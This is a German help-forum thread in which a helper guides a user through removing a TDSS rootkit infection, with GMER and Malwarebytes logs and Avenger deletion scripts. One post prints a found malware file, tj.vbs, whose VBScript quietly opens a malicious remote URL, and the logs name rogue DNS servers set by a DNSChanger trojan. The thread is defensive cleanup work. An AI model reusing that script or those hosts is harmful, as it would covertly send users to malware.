|
Plagegeister aller Art und deren Bekämpfung: Befall TDSS-X, TDSSPack-L, -K, -OWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
13.06.2009, 16:49 | #16 |
| Befall TDSS-X, TDSSPack-L, -K, -O Lade es bei materialordner.de hoch und schicke den Link zur Info.txt und zum Log.txt.
__________________ Avira Upgrade 10 ist auf dem Markt! Agressive Einstellung von Avira What goes around comes around! |
13.06.2009, 16:50 | #17 |
| Befall TDSS-X, TDSSPack-L, -K, -O Über dem Textfeld sind zwei Symbolleisten, klicke jeweils auf das vierte Symbol von rechts => # und füge dann den Text ein.
__________________Falls es zu groß ist, dann lade es bei einem Filehoster hoch (z.B. www.materialordner.de) und poste hier den Link. ciao, andreas
__________________ |
13.06.2009, 16:57 | #19 |
| Befall TDSS-X, TDSSPack-L, -K, -O Schön, dann warten wir halt beide. Ich brauche das Gmer-Log. ciao, andreas
__________________ Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung! Für alle NeuenPrivatbetreuung nur gegen Bezahlung und ich koste sehr teuer. Anleitungen Virenscanner Kompromittierung unvermeidbar? |
13.06.2009, 16:59 | #20 |
| Befall TDSS-X, TDSSPack-L, -K, -O Tschuldigung, wird gemacht |
13.06.2009, 17:01 | #21 |
| Befall TDSS-X, TDSSPack-L, -K, -O Das ist aber jetzt schnell durchgelaufen, von wegen 3 bis 10 Minuten... und hier das Ergebnis: GMER 1.0.15.14966 - http://www.gmer.net Rootkit scan 2009-06-13 18:01:00 Windows 5.1.2600 Service Pack 2 ---- System - GMER 1.0.15 ---- Code 860EF838 ZwEnumerateKey Code 861057B8 ZwFlushInstructionCache Code 8610D4BE IofCallDriver Code 86101AB6 IofCompleteRequest ---- Kernel code sections - GMER 1.0.15 ---- .text ntkrnlpa.exe!IofCallDriver 804EF0BC 5 Bytes JMP 8610D4C3 .text ntkrnlpa.exe!IofCompleteRequest 804EF14C 5 Bytes JMP 86101ABB PAGE ntkrnlpa.exe!ZwFlushInstructionCache 805B528A 5 Bytes JMP 861057BC PAGE ntkrnlpa.exe!ZwEnumerateKey 8062296E 5 Bytes JMP 860EF83C ? nwfilter.sys Das System kann die angegebene Datei nicht finden. ! ? system32\drivers\athiport.sys Das System kann den angegebenen Pfad nicht finden. ! ---- User code sections - GMER 1.0.15 ---- .text C:\WINDOWS\system32\winlogon.exe[480] ntdll.dll!LdrLoadDll 7C925CBB 5 Bytes JMP 0068000A .text C:\WINDOWS\system32\winlogon.exe[480] ntdll.dll!LdrUnloadDll 7C926C83 5 Bytes JMP 0069000A .text C:\WINDOWS\system32\services.exe[524] ntdll.dll!LdrLoadDll 7C925CBB 5 Bytes JMP 006F000A .text C:\WINDOWS\system32\services.exe[524] ntdll.dll!LdrUnloadDll 7C926C83 5 Bytes JMP 0071000A .text C:\WINDOWS\system32\lsass.exe[536] ntdll.dll!LdrLoadDll 7C925CBB 5 Bytes JMP 0071000A .text C:\WINDOWS\system32\lsass.exe[536] ntdll.dll!LdrUnloadDll 7C926C83 5 Bytes JMP 0075000A ---- Devices - GMER 1.0.15 ---- AttachedDevice \FileSystem\Ntfs \Ntfs savonaccessfilter.sys (SAV On-access and HIPS for Windows XP (x86)/Sophos Plc) AttachedDevice \FileSystem\Fastfat \Fat savonaccessfilter.sys (SAV On-access and HIPS for Windows XP (x86)/Sophos Plc) AttachedDevice \FileSystem\Fastfat \Fat fltMgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation) ---- EOF - GMER 1.0.15 ---- |
13.06.2009, 17:06 | #22 |
| Befall TDSS-X, TDSSPack-L, -K, -O uacd.sys ist tot. 1.) Deinstalliere Malwarebytes. 2.) http://www.trojaner-board.de/51187-a...i-malware.html ciao, andreas
__________________ Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung! Für alle NeuenPrivatbetreuung nur gegen Bezahlung und ich koste sehr teuer. Anleitungen Virenscanner Kompromittierung unvermeidbar? |
13.06.2009, 17:08 | #23 |
| Befall TDSS-X, TDSSPack-L, -K, -O Also ich deinstalliere es, dann fahr ich runter, und dann installier ichs neu, korrekt? |
13.06.2009, 17:09 | #24 |
| Befall TDSS-X, TDSSPack-L, -K, -Ociao, andreas
__________________ Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung! Für alle NeuenPrivatbetreuung nur gegen Bezahlung und ich koste sehr teuer. Anleitungen Virenscanner Kompromittierung unvermeidbar? |
13.06.2009, 17:14 | #25 |
| Befall TDSS-X, TDSSPack-L, -K, -O So es wäre installiert und geöffnet. Was nun? |
13.06.2009, 17:15 | #26 |
| Befall TDSS-X, TDSSPack-L, -K, -O Ich schätze mal "Vollständigen Suchlauf durchführen"? |
13.06.2009, 17:34 | #27 |
| Befall TDSS-X, TDSSPack-L, -K, -O Ja. Steht - glaub ich - auch so in der Anleitung, sogar mit Bildern. ciao, andreas p.s.: 1.) Da ComboFix nicht will, nochmal mit Avenger: Code:
ATTFilter Drivers to delete: ACEDRV06 Folders to delete: C:\Config.Msi C:\rsit Files to delete: C:\WINDOWS\system32\SETC3.tmp C:\WINDOWS\system32\SETC2.tmp C:\WINDOWS\tasks\AppleSoftwareUpdate.job C:\WINDOWS\tasks\{783AF354-B514-42d6-970E-3E8BF0A5279C}.job Code:
ATTFilter C:\bd85e4d863ccece3f42812163eb8 C:\d64625eedc0da9ce622a7e182d8a48 C:\aa848d948b894d620da925 Code:
ATTFilter C:\tj.vbs
__________________ Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung! Für alle NeuenPrivatbetreuung nur gegen Bezahlung und ich koste sehr teuer. Anleitungen Virenscanner Kompromittierung unvermeidbar? Geändert von john.doe (13.06.2009 um 18:10 Uhr) |
13.06.2009, 18:24 | #28 |
| Befall TDSS-X, TDSSPack-L, -K, -O So hier ist das Teil: Code:
ATTFilter Malwarebytes' Anti-Malware 1.37 Datenbank Version: 2182 Windows 5.1.2600 Service Pack 2 13.06.2009 19:17:07 mbam-log-2009-06-13 (19-17-07).txt Scan-Methode: Vollständiger Scan (C:\|) Durchsuchte Objekte: 180441 Laufzeit: 52 minute(s), 22 second(s) Infizierte Speicherprozesse: 0 Infizierte Speichermodule: 0 Infizierte Registrierungsschlüssel: 3 Infizierte Registrierungswerte: 0 Infizierte Dateiobjekte der Registrierung: 3 Infizierte Verzeichnisse: 1 Infizierte Dateien: 12 Infizierte Speicherprozesse: (Keine bösartigen Objekte gefunden) Infizierte Speichermodule: (Keine bösartigen Objekte gefunden) Infizierte Registrierungsschlüssel: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{500bca15-57a7-4eaf-8143-8c619470b13d} (Trojan.FakeAlert) -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{500bca15-57a7-4eaf-8143-8c619470b13d} (Trojan.FakeAlert) -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\SOFTWARE\UAC (Rootkit.Trace) -> Quarantined and deleted successfully. Infizierte Registrierungswerte: (Keine bösartigen Objekte gefunden) Infizierte Dateiobjekte der Registrierung: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{18762948-cfb3-475c-83df-84bb025720b8}\NameServer (Trojan.DNSChanger) -> Data: 85.255.112.101;85.255.112.8 -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{18762948-cfb3-475c-83df-84bb025720b8}\NameServer (Trojan.DNSChanger) -> Data: 85.255.112.101;85.255.112.8 -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\Parameters\Interfaces\{18762948-cfb3-475c-83df-84bb025720b8}\NameServer (Trojan.DNSChanger) -> Data: 85.255.112.101;85.255.112.8 -> Quarantined and deleted successfully. Infizierte Verzeichnisse: C:\resycled (Trojan.DNSChanger) -> Quarantined and deleted successfully. Infizierte Dateien: c:\WINDOWS\system32\UACbrjevrletlwnorn.dll (Trojan.TDSS) -> Quarantined and deleted successfully. c:\WINDOWS\system32\UACgscbrfclqgpeicq.dll (Trojan.TDSS) -> Quarantined and deleted successfully. c:\WINDOWS\system32\UACwilbiwaxdwktumv.dll (Trojan.TDSS) -> Quarantined and deleted successfully. c:\WINDOWS\Temp\UAC2594.tmp (Trojan.TDSS) -> Quarantined and deleted successfully. c:\WINDOWS\Temp\UACc5b1.tmp (Trojan.TDSS) -> Quarantined and deleted successfully. c:\WINDOWS\Temp\UACe6c6.tmp (Trojan.TDSS) -> Quarantined and deleted successfully. C:\WINDOWS\system32\uacinit.dll (Trojan.Agent) -> Quarantined and deleted successfully. C:\WINDOWS\Tasks\{783AF354-B514-42d6-970E-3E8BF0A5279C}.job (Trojan.Downloader) -> Quarantined and deleted successfully. c:\WINDOWS\system32\UACniomybltfaimovv.dll (Trojan.Agent) -> Quarantined and deleted successfully. c:\WINDOWS\system32\UACftjcbjrgtvplxmq.dll (Trojan.Agent) -> Quarantined and deleted successfully. c:\WINDOWS\system32\UACoiohoogyxxmbvgq.dll (Trojan.Agent) -> Quarantined and deleted successfully. c:\WINDOWS\system32\drivers\UACvkkllrhgnlvppjw.sys (Trojan.Agent) -> Quarantined and deleted successfully. |
13.06.2009, 18:27 | #29 |
| Befall TDSS-X, TDSSPack-L, -K, -O Versuche noch einmal Combofix zu starten. ciao, andreas
__________________ Kein Support per PN! Das ist hier ein Forum und keine Privatbetreuung! Für alle NeuenPrivatbetreuung nur gegen Bezahlung und ich koste sehr teuer. Anleitungen Virenscanner Kompromittierung unvermeidbar? |
13.06.2009, 18:52 | #30 |
| Befall TDSS-X, TDSSPack-L, -K, -O Mist, den letzten Beitrag hab ich nicht gesehen gehabt, da lief das Malware schon. Also: tj.vbs Code:
ATTFilter set Cleaner=createobject("wscript.shell") Cleaner.run "iexplore http://stat.winrar2009.cn:88/tj2.htm",vbhide http://www.materialordner.de/beJmOJbus41EpSoFPs31bvkWiqz7g7Kh.html Ich weiß nicht, was das für Zeug ist, das meiste ist vom 29. Juli 2008, ich hab den Rechner erst so im Oktober bekommen. Jetzt guck ich mal zwecks Combo. |
Themen zu Befall TDSS-X, TDSSPack-L, -K, -O |
adobe, automatische, befall, bios, c:\windows, computer, dateien, entfernen, folge, hängt, klick, link, maßnahme, neustarten, probleme, programme, quarantäne, seite, sophos, suche, system, system32, trojaner, version, windows, öffnen |